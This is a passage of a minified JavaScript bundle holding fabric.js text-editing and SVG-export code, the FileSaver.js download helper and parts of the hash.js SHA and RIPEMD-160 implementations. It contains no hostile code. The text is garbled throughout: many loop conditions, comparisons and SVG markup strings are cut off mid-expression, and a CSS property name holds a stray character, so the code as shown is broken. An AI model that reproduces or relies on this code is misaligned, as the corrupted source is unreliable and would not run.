x=j.util.transformPoint(x,w),(x=j.util.transformPoint(x,this.canvas.viewportTransform)).x*=ve,x.y*=le,x.x<0&&(x.x=0),x.x>ee&&(x.x=ee),x.y<0&&(x.y=0),x.y>se&&(x.y=se),x.x+=this.canvas._offset.left,x.y+=this.canvas._offset.top,{left:x.x+"px",top:x.y+"px",fontSize:p+"px",charHeight:p}},_saveEditingProps:function(){this._savedProps={hasControls:this.hasControls,borderColor:this.borderColor,lockMovementX:this.lockMovementX,lockMovementY:this.lockMovementY,hoverCursor:this.hoverCursor,selectable:this.selectable,defaultCursor:this.canvas&&this.canvas.defaultCursor,moveCursor:this.canvas&&this.canvas.moveCursor}},_restoreEditingProps:function(){!this._savedProps||(this.hoverCursor=this._savedProps.hoverCursor,this.hasControls=this._savedProps.hasControls,this.borderColor=this._savedProps.borderColor,this.selectable=this._savedProps.selectable,this.lockMovementX=this._savedProps.lockMovementX,this.lockMovementY=this._savedProps.lockMovementY,this.canvas&&(this.canvas.defaultCursor=this._savedProps.defaultCursor,this.canvas.moveCursor=this._savedProps.moveCursor))},exitEditing:function(){var C=this._textBeforeEdit!==this.text,b=this.hiddenTextarea;return this.selected=!1,this.isEditing=!1,this.selectionEnd=this.selectionStart,b&&(b.blur&&b.blur(),b.parentNode&&b.parentNode.removeChild(b)),this.hiddenTextarea=null,this.abortCursorAnimation(),this._restoreEditingProps(),this._currentCursorOpacity=0,this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this.fire("editing:exited"),C&&this.fire("modified"),this.canvas&&(this.canvas.off("mouse:move",this.mouseMoveHandler),this.canvas.fire("text:editing:exited",{target:this}),C&&this.canvas.fire("object:modified",{target:this})),this},_removeExtraneousStyles:function(){for(var C in this.styles)this._textLines[C]||delete this.styles[C]},removeStyleFromTo:function(C,b){var x,S,_=this.get2DCursorLocation(C,!0),y=this.get2DCursorLocation(b,!0),A=_.lineIndex,p=_.charIndex,D=y.lineIndex,w=y.charIndex;if(A!==D){if(this.styles[A])for(x=p;x=w&&(S[B-O]=S[K],delete S[K])}},shiftLineStyles:function(C,b){var _=E(this.styles);for(var y in this.styles){var A=parseInt(y,10);A>C&&(this.styles[A+b]=_[A],_[A-b]||delete this.styles[A])}},restartCursorIfNeeded:function(){(!this._currentTickState||this._currentTickState.isAborted||!this._currentTickCompleteState||this._currentTickCompleteState.isAborted)&&this.initDelayedCursor()},insertNewlineStyleObject:function(C,b,_,y){var A,p={},D=!1,w=this._unwrappedTextLines[C].length===b;for(var x in _||(_=1),this.shiftLineStyles(C,_),this.styles[C]&&(A=this.styles[C][0===b?b:b-1]),this.styles[C]){var S=parseInt(x,10);S>=b&&(D=!0,p[S-b]=this.styles[C][x],w&&0===b||delete this.styles[C][x])}var O=!1;for(D&&!w&&(this.styles[C+_]=p,O=!0),O&&_--;_>0;)y&&y[_-1]?this.styles[C+_]={0:E(y[_-1])}:A?this.styles[C+_]={0:E(A)}:delete this.styles[C+_],_--;this._forceClearCache=!0},insertCharStyleObject:function(C,b,_,y){this.styles||(this.styles={});var A=this.styles[C],p=A?E(A):{};for(var D in _||(_=1),p){var w=parseInt(D,10);w>=b&&(A[w+_]=p[w],p[w-_]||delete A[w])}if(this._forceClearCache=!0,y)for(;_--;)!Object.keys(y[_]).length||(this.styles[C]||(this.styles[C]={}),this.styles[C][b+_]=E(y[_]));else if(A)for(var x=A[b?b-1:1];x&&_--;)this.styles[C][b+_]=E(x)},insertNewStyleBlock:function(C,b,_){for(var y=this.get2DCursorLocation(b,!0),A=[0],p=0,D=0;D0&&(this.insertCharStyleObject(y.lineIndex,y.charIndex,A[0],_),_=_&&_.slice(A[0]+1)),p&&this.insertNewlineStyleObject(y.lineIndex,y.charIndex+A[0],p),D=1;D0?this.insertCharStyleObject(y.lineIndex+D,0,A[D],_):_&&this.styles[y.lineIndex+D]&&_[0]&&(this.styles[y.lineIndex+D][0]=_[0]),_=_&&_.slice(A[D]+1);A[D]>0&&this.insertCharStyleObject(y.lineIndex+D,0,A[D],_)},setSelectionStartEndWithShift:function(C,b,_){_<=C?(b===C?this._selectionDirection="left":"right"===this._selectionDirection&&(this._selectionDirection="left",this.selectionEnd=C),this.selectionStart=_):_>C&&_C?this.selectionStart=C:this.selectionStart<0&&(this.selectionStart=0),this.selectionEnd>C?this.selectionEnd=C:this.selectionEnd<0&&(this.selectionEnd=0)}})}(),j.util.object.extend(j.IText.prototype,{initDoubleClickSimulation:function(){this.__lastClickTime=+new Date,this.__lastLastClickTime=+new Date,this.__lastPointer={},this.on("mousedown",this.onMouseDown)},onMouseDown:function(E){if(this.canvas){this.__newClickTime=+new Date;var C=E.pointer;this.isTripleClick(C)&&(this.fire("tripleclick",E),this._stopEvent(E.e)),this.__lastLastClickTime=this.__lastClickTime,this.__lastClickTime=this.__newClickTime,this.__lastPointer=C,this.__lastIsEditing=this.isEditing,this.__lastSelected=this.selected}},isTripleClick:function(E){return this.__newClickTime-this.__lastClickTime<500&&this.__lastClickTime-this.__lastLastClickTime<500&&this.__lastPointer.x===E.x&&this.__lastPointer.y===E.y},_stopEvent:function(E){E.preventDefault&&E.preventDefault(),E.stopPropagation&&E.stopPropagation()},initCursorSelectionHandlers:function(){this.initMousedownHandler(),this.initMouseupHandler(),this.initClicks()},doubleClickHandler:function(E){!this.isEditing||this.selectWord(this.getSelectionStartFromPointer(E.e))},tripleClickHandler:function(E){!this.isEditing||this.selectLine(this.getSelectionStartFromPointer(E.e))},initClicks:function(){this.on("mousedblclick",this.doubleClickHandler),this.on("tripleclick",this.tripleClickHandler)},_mouseDownHandler:function(E){!this.canvas||!this.editable||E.e.button&&1!==E.e.button||(this.__isMousedown=!0,this.selected&&(this.inCompositionMode=!1,this.setCursorByClick(E.e)),this.isEditing&&(this.__selectionStartOnMouseDown=this.selectionStart,this.selectionStart===this.selectionEnd&&this.abortCursorAnimation(),this.renderCursorOrSelection()))},_mouseDownHandlerBefore:function(E){!this.canvas||!this.editable||E.e.button&&1!==E.e.button||(this.selected=this===this.canvas._activeObject)},initMousedownHandler:function(){this.on("mousedown",this._mouseDownHandler),this.on("mousedown:before",this._mouseDownHandlerBefore)},initMouseupHandler:function(){this.on("mouseup",this.mouseUpHandler)},mouseUpHandler:function(E){if(this.__isMousedown=!1,!(!this.editable||this.group||E.transform&&E.transform.actionPerformed||E.e.button&&1!==E.e.button)){if(this.canvas){var C=this.canvas._activeObject;if(C&&C!==this)return}this.__lastSelected&&!this.__corner?(this.selected=!1,this.__lastSelected=!1,this.enterEditing(E.e),this.selectionStart===this.selectionEnd?this.initDelayedCursor(!0):this.renderCursorOrSelection()):this.selected=!0}},setCursorByClick:function(E){var C=this.getSelectionStartFromPointer(E);E.shiftKey?this.setSelectionStartEndWithShift(this.selectionStart,this.selectionEnd,C):(this.selectionStart=C,this.selectionEnd=C),this.isEditing&&(this._fireSelectionChanged(),this._updateTextarea())},getSelectionStartFromPointer:function(E){for(var w,C=this.getLocalPointer(E),b=0,_=0,y=0,A=0,p=0,x=0,S=this._textLines.length;x0&&(A+=this._textLines[x-1].length+this.missingNewlineOffset(x-1));_=this._getLineLeftOffset(p)*this.scaleX,w=this._textLines[p],"rtl"===this.direction&&(C.x=this.width*this.scaleX-C.x+_);for(var O=0,B=w.length;OE.x-C||p<0?0:1);return this.flipX&&(w=y-w),w>this._text.length&&(w=this._text.length),w}}),j.util.object.extend(j.IText.prototype,{initHiddenTextarea:function(){this.hiddenTextarea=j.document.createElement("textarea"),this.hiddenTextarea.setAttribute("autocapitalize","off"),this.hiddenTextarea.setAttribute("autocorrect","off"),this.hiddenTextarea.setAttribute("autocomplete","off"),this.hiddenTextarea.setAttribute("spellcheck","false"),this.hiddenTextarea.setAttribute("data-fabric-hiddentextarea",""),this.hiddenTextarea.setAttribute("wrap","off");var E=this._calcTextareaPosition();this.hiddenTextarea.style.cssText="position: absolute; top: "+E.top+"; left: "+E.left+"; z-index: -999; opacity: 0; width: 1px; height: 1px; font-size: 1px; padding\uff70top: "+E.fontSize+";",this.hiddenTextareaContainer?this.hiddenTextareaContainer.appendChild(this.hiddenTextarea):j.document.body.appendChild(this.hiddenTextarea),j.util.addListener(this.hiddenTextarea,"keydown",this.onKeyDown.bind(this)),j.util.addListener(this.hiddenTextarea,"keyup",this.onKeyUp.bind(this)),j.util.addListener(this.hiddenTextarea,"input",this.onInput.bind(this)),j.util.addListener(this.hiddenTextarea,"copy",this.copy.bind(this)),j.util.addListener(this.hiddenTextarea,"cut",this.copy.bind(this)),j.util.addListener(this.hiddenTextarea,"paste",this.paste.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionstart",this.onCompositionStart.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionupdate",this.onCompositionUpdate.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionend",this.onCompositionEnd.bind(this)),!this._clickHandlerInitialized&&this.canvas&&(j.util.addListener(this.canvas.upperCanvasEl,"click",this.onClick.bind(this)),this._clickHandlerInitialized=!0)},keysMap:{9:"exitEditing",27:"exitEditing",33:"moveCursorUp",34:"moveCursorDown",35:"moveCursorRight",36:"moveCursorLeft",37:"moveCursorLeft",38:"moveCursorUp",39:"moveCursorRight",40:"moveCursorDown"},keysMapRtl:{9:"exitEditing",27:"exitEditing",33:"moveCursorUp",34:"moveCursorDown",35:"moveCursorLeft",36:"moveCursorRight",37:"moveCursorRight",38:"moveCursorUp",39:"moveCursorLeft",40:"moveCursorDown"},ctrlKeysMapUp:{67:"copy",88:"cut"},ctrlKeysMapDown:{65:"selectAll"},onClick:function(){this.hiddenTextarea&&this.hiddenTextarea.focus()},onKeyDown:function(E){if(this.isEditing){var C="rtl"===this.direction?this.keysMapRtl:this.keysMap;if(E.keyCode in C)this[C[E.keyCode]](E);else{if(!(E.keyCode in this.ctrlKeysMapDown)||!E.ctrlKey&&!E.metaKey)return;this[this.ctrlKeysMapDown[E.keyCode]](E)}E.stopImmediatePropagation(),E.preventDefault(),E.keyCode>=33&&E.keyCode<=40?(this.inCompositionMode=!1,this.clearContextTop(),this.renderCursorOrSelection()):this.canvas&&this.canvas.requestRenderAll()}},onKeyUp:function(E){!this.isEditing||this._copyDone||this.inCompositionMode?this._copyDone=!1:E.keyCode in this.ctrlKeysMapUp&&(E.ctrlKey||E.metaKey)&&(this[this.ctrlKeysMapUp[E.keyCode]](E),E.stopImmediatePropagation(),E.preventDefault(),this.canvas&&this.canvas.requestRenderAll())},onInput:function(E){var C=this.fromPaste;if(this.fromPaste=!1,E&&E.stopPropagation(),this.isEditing){var A,p,O,B,K,b=this._splitTextIntoLines(this.hiddenTextarea.value).graphemeText,_=this._text.length,y=b.length,D=y-_,w=this.selectionStart,x=this.selectionEnd,S=w!==x;if(""===this.hiddenTextarea.value)return this.styles={},this.updateFromTextArea(),this.fire("changed"),void(this.canvas&&(this.canvas.fire("text:changed",{target:this}),this.canvas.requestRenderAll()));var ee=this.fromStringToGraphemeSelection(this.hiddenTextarea.selectionStart,this.hiddenTextarea.selectionEnd,this.hiddenTextarea.value),se=w>ee.selectionStart;S?(A=this._text.slice(w,x),D+=x-w):y<_&&(A=se?this._text.slice(x+D,x):this._text.slice(w,w-D)),p=b.slice(ee.selectionEnd-D,ee.selectionEnd),A&&A.length&&(p.length&&(O=this.getSelectionStyles(w,w+1,!1),O=p.map(function(){return O[0]})),S?(B=w,K=x):se?(B=x-A.length,K=x):(B=x,K=x+A.length),this.removeStyleFromTo(B,K)),p.length&&(C&&p.join("")===j.copiedText&&!j.disableStyleCopyPaste&&(O=j.copiedTextStyle),this.insertNewStyleBlock(p,w,O)),this.updateFromTextArea(),this.fire("changed"),this.canvas&&(this.canvas.fire("text:changed",{target:this}),this.canvas.requestRenderAll())}},onCompositionStart:function(){this.inCompositionMode=!0},onCompositionEnd:function(){this.inCompositionMode=!1},onCompositionUpdate:function(E){this.compositionStart=E.target.selectionStart,this.compositionEnd=E.target.selectionEnd,this.updateTextareaPosition()},copy:function(){this.selectionStart!==this.selectionEnd&&(j.copiedText=this.getSelectedText(),j.copiedTextStyle=j.disableStyleCopyPaste?null:this.getSelectionStyles(this.selectionStart,this.selectionEnd,!0),this._copyDone=!0)},paste:function(){this.fromPaste=!0},_getClipboardData:function(E){return E&&E.clipboardData||j.window.clipboardData},_getWidthBeforeCursor:function(E,C){var _,b=this._getLineLeftOffset(E);return C>0&&(b+=(_=this.__charBounds[E][C-1]).left+_.width),b},getDownCursorOffset:function(E,C){var b=this._getSelectionForOffset(E,C),_=this.get2DCursorLocation(b),y=_.lineIndex;if(y===this._textLines.length-1||E.metaKey||34===E.keyCode)return this._text.length-b;var A=_.charIndex,p=this._getWidthBeforeCursor(y,A),D=this._getIndexOnLine(y+1,p);return this._textLines[y].slice(A).length+D+1+this.missingNewlineOffset(y)},_getSelectionForOffset:function(E,C){return E.shiftKey&&this.selectionStart!==this.selectionEnd&&C?this.selectionEnd:this.selectionStart},getUpCursorOffset:function(E,C){var b=this._getSelectionForOffset(E,C),_=this.get2DCursorLocation(b),y=_.lineIndex;if(0===y||E.metaKey||33===E.keyCode)return-b;var A=_.charIndex,p=this._getWidthBeforeCursor(y,A),D=this._getIndexOnLine(y-1,p),w=this._textLines[y].slice(0,A),x=this.missingNewlineOffset(y-1);return-this._textLines[y-1].length+D-w.length+(1-x)},_getIndexOnLine:function(E,C){for(var p,D,b=this._textLines[E],y=this._getLineLeftOffset(E),A=0,w=0,x=b.length;wC){D=!0;var O=y,B=Math.abs(y-p-C);A=Math.abs(O-C)=this._text.length&&this.selectionEnd>=this._text.length||this._moveCursorUpOrDown("Down",E)},moveCursorUp:function(E){0===this.selectionStart&&0===this.selectionEnd||this._moveCursorUpOrDown("Up",E)},_moveCursorUpOrDown:function(E,C){var _=this["get"+E+"CursorOffset"](C,"right"===this._selectionDirection);C.shiftKey?this.moveCursorWithShift(_):this.moveCursorWithoutShift(_),0!==_&&(this.setSelectionInBoundaries(),this.abortCursorAnimation(),this._currentCursorOpacity=1,this.initDelayedCursor(),this._fireSelectionChanged(),this._updateTextarea())},moveCursorWithShift:function(E){return this.setSelectionStartEndWithShift(this.selectionStart,this.selectionEnd,"left"===this._selectionDirection?this.selectionStart+E:this.selectionEnd+E),0!==E},moveCursorWithoutShift:function(E){return E<0?(this.selectionStart+=E,this.selectionEnd=this.selectionStart):(this.selectionEnd+=E,this.selectionStart=this.selectionEnd),0!==E},moveCursorLeft:function(E){0===this.selectionStart&&0===this.selectionEnd||this._moveCursorLeftOrRight("Left",E)},_move:function(E,C,b){var _;if(E.altKey)_=this["findWordBoundary"+b](this[C]);else{if(!E.metaKey&&35!==E.keyCode&&36!==E.keyCode)return this[C]+="Left"===b?-1:1,!0;_=this["findLineBoundary"+b](this[C])}if(void 0!==_&&this[C]!==_)return this[C]=_,!0},_moveLeft:function(E,C){return this._move(E,C,"Left")},_moveRight:function(E,C){return this._move(E,C,"Right")},moveCursorLeftWithoutShift:function(E){var C=!0;return this._selectionDirection="left",this.selectionEnd===this.selectionStart&&0!==this.selectionStart&&(C=this._moveLeft(E,"selectionStart")),this.selectionEnd=this.selectionStart,C},moveCursorLeftWithShift:function(E){return"right"===this._selectionDirection&&this.selectionStart!==this.selectionEnd?this._moveLeft(E,"selectionEnd"):0!==this.selectionStart?(this._selectionDirection="left",this._moveLeft(E,"selectionStart")):void 0},moveCursorRight:function(E){this.selectionStart>=this._text.length&&this.selectionEnd>=this._text.length||this._moveCursorLeftOrRight("Right",E)},_moveCursorLeftOrRight:function(E,C){var b="moveCursor"+E+"With";this._currentCursorOpacity=1,this[b+=C.shiftKey?"Shift":"outShift"](C)&&(this.abortCursorAnimation(),this.initDelayedCursor(),this._fireSelectionChanged(),this._updateTextarea())},moveCursorRightWithShift:function(E){return"left"===this._selectionDirection&&this.selectionStart!==this.selectionEnd?this._moveRight(E,"selectionStart"):this.selectionEnd!==this._text.length?(this._selectionDirection="right",this._moveRight(E,"selectionEnd")):void 0},moveCursorRightWithoutShift:function(E){var C=!0;return this._selectionDirection="right",this.selectionStart===this.selectionEnd?(C=this._moveRight(E,"selectionStart"),this.selectionEnd=this.selectionStart):this.selectionStart=this.selectionEnd,C},removeChars:function(E,C){void 0===C&&(C=E+1),this.removeStyleFromTo(E,C),this._text.splice(E,C-E),this.text=this._text.join(""),this.set("dirty",!0),this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this._removeExtraneousStyles()},insertChars:function(E,C,b,_){void 0===_&&(_=b),_>b&&this.removeStyleFromTo(b,_);var y=j.util.string.graphemeSplit(E);this.insertNewStyleBlock(y,b,C),this._text=[].concat(this._text.slice(0,b),y,this._text.slice(_)),this.text=this._text.join(""),this.set("dirty",!0),this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this._removeExtraneousStyles()}}),function(){var E=j.util.toFixed,C=/ +/g;j.util.object.extend(j.Text.prototype,{_toSVG:function(){var b=this._getSVGLeftTopOffsets(),_=this._getSVGTextAndBg(b.textTop,b.textLeft);return this._wrapSVGTextAndBg(_)},toSVG:function(b){return this._createBaseSVGMarkup(this._toSVG(),{reviver:b,noStyle:!0,withShadow:!0})},_getSVGLeftTopOffsets:function(){return{textLeft:-this.width/2,textTop:-this.height/2,lineTop:this.getHeightOfLine(0)}},_wrapSVGTextAndBg:function(b){var y=this.getSvgTextDecoration(this);return[b.textBgRects.join(""),'\t\t",b.textSpans.join(""),"\n"]},_getSVGTextAndBg:function(b,_){var D,y=[],A=[],p=b;this._setSVGBg(A);for(var w=0,x=this._textLines.length;w",j.util.string.escapeXml(b),""].join("")},_setSVGTextLineText:function(b,_,y,A){var w,x,O,B,se,p=this.getHeightOfLine(_),D=-1!==this.textAlign.indexOf("justify"),S="",K=0,ee=this._textLines[_];A+=p*(1-this._fontSizeFraction)/this.lineHeight;for(var ve=0,le=ee.length-1;ve<=le;ve++)se=ve===le||this.charSpacing,S+=ee[ve],O=this.__charBounds[_][ve],0===K?(y+=O.kernedWidth-O.width,K+=O.width):K+=O.kernedWidth,D&&!se&&this._reSpaceAndTab.test(ee[ve])&&(se=!0),se||(w=w||this.getCompleteStyleDeclaration(_,ve),x=this.getCompleteStyleDeclaration(_,ve+1),se=j.util.hasStyleChanged(w,x,!0)),se&&(B=this._getStyleDeclaration(_,ve)||{},b.push(this._createTextCharSpan(S,B,y,A)),S="",w=x,y+=K,K=0)},_pushTextBgRect:function(b,_,y,A,p,D){var w=j.Object.NUM_FRACTION_DIGITS;b.push("\t\t\n')},_setSVGTextLineBg:function(b,_,y,A){for(var S,O,p=this._textLines[_],D=this.getHeightOfLine(_)/this.lineHeight,w=0,x=0,B=this.getValueOfPropertyAt(_,0,"textBackgroundColor"),K=0,ee=p.length;Kthis.width&&this._set("width",this.dynamicMinWidth),-1!==this.textAlign.indexOf("justify")&&this.enlargeSpaces(),this.height=this.calcTextHeight(),this.saveState({propertySet:"_dimensionAffectingProps"}))},_generateStyleMap:function(b){for(var _=0,y=0,A=0,p={},D=0;D0?(y=0,A++,_++):!this.splitByGrapheme&&this._reSpaceAndTab.test(b.graphemeText[A])&&D>0&&(y++,A++),p[D]={line:_,offset:y},A+=b.graphemeLines[D].length,y+=b.graphemeLines[D].length;return p},styleHas:function(b,_){if(this._styleMap&&!this.isWrapping){var y=this._styleMap[_];y&&(_=y.line)}return C.Text.prototype.styleHas.call(this,b,_)},isEmptyStyles:function(b){if(!this.styles)return!0;var A,p,_=0,D=!1,w=this._styleMap[b],x=this._styleMap[b+1];for(var S in w&&(b=w.line,_=w.offset),x&&(D=x.line===b,A=x.offset),p=void 0===b?this.styles:{line:this.styles[b]})for(var O in p[S])if(O>=_&&(!D||Oy&&!le?(w.push(x),x=[],p=ee,le=!0):p+=ye,!le&&!D&&x.push(K),x=x.concat(O),se=D?0:this._measureWord([K],_,B),B++,le=!1,ee>ve&&(ve=ee);return l&&w.push(x),ve+z>this.dynamicMinWidth&&(this.dynamicMinWidth=ve-ye+z),w},isEndOfWrapping:function(b){return!this._styleMap[b+1]||this._styleMap[b+1].line!==this._styleMap[b].line},missingNewlineOffset:function(b){return this.splitByGrapheme?this.isEndOfWrapping(b)?1:0:1},_splitTextIntoLines:function(b){for(var _=C.Text.prototype._splitTextIntoLines.call(this,b),y=this._wrapText(_.lines,this.width),A=new Array(y.length),p=0;p=_.status}function $(b){try{b.dispatchEvent(new MouseEvent("click"))}catch(y){var _=document.createEvent("MouseEvents");_.initMouseEvent("click",!0,!0,window,0,0,0,80,20,!1,!1,!1,!1,0,null),b.dispatchEvent(_)}}var U="object"==typeof window&&window.window===window?window:"object"==typeof self&&self.self===self?self:"object"==typeof global&&global.global===global?global:void 0,E=U.navigator&&/Macintosh/.test(navigator.userAgent)&&/AppleWebKit/.test(navigator.userAgent)&&!/Safari/.test(navigator.userAgent),C=U.saveAs||("object"!=typeof window||window!==U?function(){}:"download"in HTMLAnchorElement.prototype&&!E?function(b,_,y){var A=U.URL||U.webkitURL,p=document.createElement("a");p.download=_=_||b.name||"download",p.rel="noopener","string"==typeof b?(p.href=b,p.origin===location.origin?$(p):I(p.href)?ae(b,_,y):$(p,p.target="_blank")):(p.href=A.createObjectURL(b),setTimeout(function(){A.revokeObjectURL(p.href)},4e4),setTimeout(function(){$(p)},0))}:"msSaveOrOpenBlob"in navigator?function(b,_,y){if(_=_||b.name||"download","string"!=typeof b)navigator.msSaveOrOpenBlob(function Q(b,_){return void 0===_?_={autoBom:!1}:"object"!=typeof _&&(console.warn("Deprecated: Expected third argument to be a object"),_={autoBom:!_}),_.autoBom&&/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(b.type)?new Blob(["\ufeff",b],{type:b.type}):b}(b,y),_);else if(I(b))ae(b,_,y);else{var A=document.createElement("a");A.href=b,A.target="_blank",setTimeout(function(){$(A)})}}:function(b,_,y,A){if((A=A||open("","_blank"))&&(A.document.title=A.document.body.innerText="downloading..."),"string"==typeof b)return ae(b,_,y);var p="application/octet-stream"===b.type,D=/constructor/i.test(U.HTMLElement)||U.safari,w=/CriOS\/[\d]+/.test(navigator.userAgent);if((w||p&&D||E)&&"undefined"!=typeof FileReader){var x=new FileReader;x.onloadend=function(){var B=x.result;B=w?B:B.replace(/^data:[^;]*;/,"data:attachment/file;"),A?A.location.href=B:location=B,A=null},x.readAsDataURL(b)}else{var S=U.URL||U.webkitURL,O=S.createObjectURL(b);A?A.location=O:location.href=O,A=null,setTimeout(function(){S.revokeObjectURL(O)},4e4)}});U.saveAs=C.saveAs=C,Pe.exports=C}.apply(we,[]))&&(Pe.exports=j)},5110:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(4539).Transform;function I($){j.call(this),this._block=ie.allocUnsafe($),this._blockSize=$,this._blockOffset=0,this._length=[0,0,0,0],this._finalized=!1}de(2270)(I,j),I.prototype._transform=function($,U,E){var C=null;try{this.update($,U)}catch(b){C=b}E(C)},I.prototype._flush=function($){var U=null;try{this.push(this.digest())}catch(E){U=E}$(U)},I.prototype.update=function($,U){if(function ae($,U){if(!ie.isBuffer($)&&"string"!=typeof $)throw new TypeError(U+" must be a string or a buffer")}($,"Data"),this._finalized)throw new Error("Digest already called");ie.isBuffer($)||($=ie.from($,U));for(var E=this._block,C=0;this._blockOffset+$.length-C>=this._blockSize;){for(var b=this._blockOffset;b0;++_)this._length[_]+=y,(y=this._length[_]/4294967296|0)>0&&(this._length[_]-=4294967296*y);return this},I.prototype._update=function(){throw new Error("_update is not implemented")},I.prototype.digest=function($){if(this._finalized)throw new Error("Digest already called");this._finalized=!0;var U=this._digest();void 0!==$&&(U=U.toString($)),this._block.fill(0),this._blockOffset=0;for(var E=0;E<4;++E)this._length[E]=0;return U},I.prototype._digest=function(){throw new Error("_digest is not implemented")},Pe.exports=I},8414:(Pe,we,de)=>{var ie=we;ie.utils=de(6378),ie.common=de(7774),ie.sha=de(7452),ie.ripemd=de(7699),ie.hmac=de(5351),ie.sha1=ie.sha.sha1,ie.sha256=ie.sha.sha256,ie.sha224=ie.sha.sha224,ie.sha384=ie.sha.sha384,ie.sha512=ie.sha.sha512,ie.ripemd160=ie.ripemd.ripemd160},7774:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(490);function Q(){this.pending=null,this.pendingTotal=0,this.blockSize=this.constructor.blockSize,this.outSize=this.constructor.outSize,this.hmacStrength=this.constructor.hmacStrength,this.padLength=this.constructor.padLength/8,this.endian="big",this._delta8=this.blockSize/8,this._delta32=this.blockSize/32}we.BlockHash=Q,Q.prototype.update=function(I,$){if(I=ie.toArray(I,$),this.pending=this.pending?this.pending.concat(I):I,this.pendingTotal+=I.length,this.pending.length>=this._delta8){var U=(I=this.pending).length%this._delta8;this.pending=I.slice(I.length-U,I.length),0===this.pending.length&&(this.pending=null),I=ie.join32(I,0,I.length-U,this.endian);for(var E=0;E>>24&255,E[C++]=I>>>16&255,E[C++]=I>>>8&255,E[C++]=255&I}else for(E[C++]=255&I,E[C++]=I>>>8&255,E[C++]=I>>>16&255,E[C++]=I>>>24&255,E[C++]=0,E[C++]=0,E[C++]=0,E[C++]=0,b=8;b{"use strict";var ie=de(6378),j=de(490);function Q(ae,I,$){if(!(this instanceof Q))return new Q(ae,I,$);this.Hash=ae,this.blockSize=ae.blockSize/8,this.outSize=ae.outSize/8,this.inner=null,this.outer=null,this._init(ie.toArray(I,$))}Pe.exports=Q,Q.prototype._init=function(I){I.length>this.blockSize&&(I=(new this.Hash).update(I).digest()),j(I.length<=this.blockSize);for(var $=I.length;${"use strict";var ie=de(6378),j=de(7774),Q=ie.rotl32,ae=ie.sum32,I=ie.sum32_3,$=ie.sum32_4,U=j.BlockHash;function E(){if(!(this instanceof E))return new E;U.call(this),this.h=[1732584193,4023233417,2562383102,271733878,3285377520],this.endian="little"}function C(w,x,S,O){return w<=15?x^S^O:w<=31?x&S|~x&O:w<=47?(x|~S)^O:w<=63?x&O|S&~O:x^(S|~O)}function _(w){return w<=15?1352829926:w<=31?1548603684:w<=47?1836072691:w<=63?2053994217:0}ie.inherits(E,U),we.ripemd160=E,E.blockSize=512,E.outSize=160,E.hmacStrength=192,E.padLength=64,E.prototype._update=function(x,S){for(var O=this.h[0],B=this.h[1],K=this.h[2],ee=this.h[3],se=this.h[4],ve=O,le=B,ye=K,z=ee,l=se,f=0;f<80;f++){var v=ae(Q($(O,C(f,B,K,ee),x[y[f]+S],(w=f)<=15?0:w<=31?1518500249:w<=47?1859775393:w<=63?2400959708:2840853838),p[f]),se);O=se,se=ee,ee=Q(K,10),K=B,B=v,v=ae(Q($(ve,C(79-f,le,ye,z),x[A[f]+S],_(f)),D[f]),l),ve=l,l=z,z=Q(ye,10),ye=le,le=v}var w;v=I(this.h[1],K,z),this.h[1]=I(this.h[2],ee,l),this.h[2]=I(this.h[3],se,ve),this.h[3]=I(this.h[4],O,le),this.h[4]=I(this.h[0],B,ye),this.h[0]=v},E.prototype._digest=function(x){return"hex"===x?ie.toHex32(this.h,"little"):ie.split32(this.h,"little")};var y=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,7,4,13,1,10,6,15,3,12,0,9,5,2,14,11,8,3,10,14,4,9,15,8,1,2,7,0,6,13,11,5,12,1,9,11,10,0,8,12,4,13,3,7,15,14,5,6,2,4,0,5,9,7,12,2,10,14,1,3,8,11,6,15,13],A=[5,14,7,0,9,2,11,4,13,6,15,8,1,10,3,12,6,11,3,7,0,13,5,10,14,15,8,12,4,9,1,2,15,5,1,3,7,14,6,9,11,8,12,2,10,0,4,13,8,6,4,1,3,11,15,0,5,12,2,13,9,7,10,14,12,15,10,4,1,5,8,7,6,2,13,14,0,3,9,11],p=[11,14,15,12,5,8,7,9,11,13,14,15,6,7,9,8,7,6,8,13,11,9,7,15,7,12,15,9,11,7,13,12,11,13,6,7,14,9,13,15,14,8,13,6,5,12,7,5,11,12,14,15,14,15,9,8,9,14,5,6,8,6,5,12,9,15,5,11,6,8,13,12,5,12,13,14,11,8,5,6],D=[8,9,9,11,13,15,15,5,7,7,8,11,14,14,12,6,9,13,15,7,12,8,9,11,7,7,12,7,6,15,13,11,9,7,15,11,8,6,6,14,12,13,5,14,13,13,7,5,15,5,8,11,14,14,6,14,6,9,12,9,12,5,15,8,8,5,12,9,12,5,14,6,8,13,6,5,15,13,11,11]},7452:(Pe,we,de)=>{"use strict";we.sha1=de(1721),we.sha224=de(3455),we.sha256=de(7756),we.sha384=de(925),we.sha512=de(617)},1721:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),Q=de(9524),ae=ie.rotl32,I=ie.sum32,$=ie.sum32_5,U=Q.ft_1,E=j.BlockHash,C=[1518500249,1859775393,2400959708,3395469782];function b(){if(!(this instanceof b))return new b;E.call(this),this.h=[1732584193,4023233417,2562383102,271733878,3285377520],this.W=new Array(80)}ie.inherits(b,E),Pe.exports=b,b.blockSize=512,b.outSize=160,b.hmacStrength=80,b.padLength=64,b.prototype._update=function(y,A){for(var p=this.W,D=0;D<16;D++)p[D]=y[A+D];for(;D{"use strict";var ie=de(6378),j=de(7756);function Q(){if(!(this instanceof Q))return new Q;j.call(this),this.h=[3238371032,914150663,812702999,4144912697,4290775857,1750603025,1694076839,3204075428]}ie.inherits(Q,j),Pe.exports=Q,Q.blockSize=512,Q.outSize=224,Q.hmacStrength=192,Q.padLength=64,Q.prototype._digest=function(I){return"hex"===I?ie.toHex32(this.h.slice(0,7),"big"):ie.split32(this.h.slice(0,7),"big")}},7756:(Pe,we,de)=>{"use strict";var 